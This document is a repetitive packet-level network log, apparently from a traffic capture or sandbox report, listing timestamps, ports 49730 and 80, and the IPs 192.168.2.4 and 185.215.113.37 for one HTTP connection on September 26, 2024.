Sep 26, 2024 18:27:11.906913042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035147905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035243988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035243034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035279989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035315037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035331964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035363913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035367966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035404921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035420895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035430908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035455942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035475969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035509109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035511971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035557032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035559893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035610914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035695076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035729885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035748005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035763979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035778046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035798073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035811901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035830975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035849094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035862923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035876989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035900116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035912037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035934925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035969973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035979986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.035990000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.035995007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036010981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036026001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036031961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036041021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036056042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036061049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036071062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036084890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036098957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036099911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036114931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036125898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036129951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036144972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036158085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036165953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036179066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036186934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036195993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036211014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036226988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036252022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036560059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036581039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036595106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036607027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036609888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036626101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036638975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036648989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036653042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036667109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036680937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036688089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036695004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036709070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036710978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036725044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036739111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036739111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036752939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036767960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036771059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036782980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036794901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036798954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036813021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036818027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036828995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036842108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036856890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.036864042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.036915064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037237883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037252903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037266016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037278891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037283897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037293911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037345886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037386894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037396908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037403107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037416935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037431002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037436008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037445068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037460089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037472010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037472963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037487984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037502050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037508011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037516117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037529945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037530899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037544012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037558079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037566900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037571907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037586927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037599087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037601948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.037619114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.037652969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038198948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038213968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038228035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038243055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038248062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038258076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038271904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038271904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038288116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038300991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038306952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038316965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038331032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038336039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038345098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038360119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038363934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038388014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038408995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038577080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038592100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038605928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038625956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038654089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038744926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038759947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038774014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038788080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038801908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038801908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038816929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038827896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038831949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038847923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038861036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038861990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038877964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038882971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038892984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038908005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038922071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038929939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038937092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038952112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038965940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038976908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.038980007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.038997889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.039002895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.039028883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.039047956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.123652935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123732090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123733044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.123745918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123754025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123764992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123776913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123790026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123807907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.123816967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123830080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123841047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123852015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.123871088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.123900890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124041080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124052048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124062061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124073982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124084949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124095917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124094963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124106884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124113083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124133110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124170065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124170065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124336958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124347925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124357939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124368906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124382973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124391079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124393940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124406099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124439955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124469995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124640942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124653101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124661922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124672890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124682903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124685049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124695063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124706984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124707937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124744892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124789953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124849081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124887943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124897957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124907970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124917984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124927998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124938011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.124938965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124952078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.124958038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125000000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125030041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125248909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125260115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125269890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125281096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125291109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125302076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125303030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125315905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125328064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125333071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125339031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125355005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125384092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125550032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125560999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125598907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125634909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125735998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125746965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125757933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125767946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125777960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125787020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125790119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125809908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125821114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125835896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125842094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125848055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125848055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125852108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125864029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125874996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125880003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125885963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125897884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.125905037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125926971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.125946999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126249075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126260996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126271009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126302958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126334906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126435995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126447916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126456976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126468897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126478910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126492023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126502037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126507998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126507998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126513004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126524925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126535892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126539946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126547098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126554966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126559973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126571894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126581907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126583099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126605988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126627922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126935959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126948118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126956940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126967907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126977921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.126986980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.126988888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127012968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127048969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127079964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127091885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127100945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127118111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127127886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127135038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127140045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127151966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127156019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127163887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127173901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127185106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127196074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127197981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127242088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127707005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127718925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127727985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127754927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127794027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127824068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127835989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127846003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127856970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127867937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127877951 CEST	80	49730	185.215.113.37	192.168.2.4
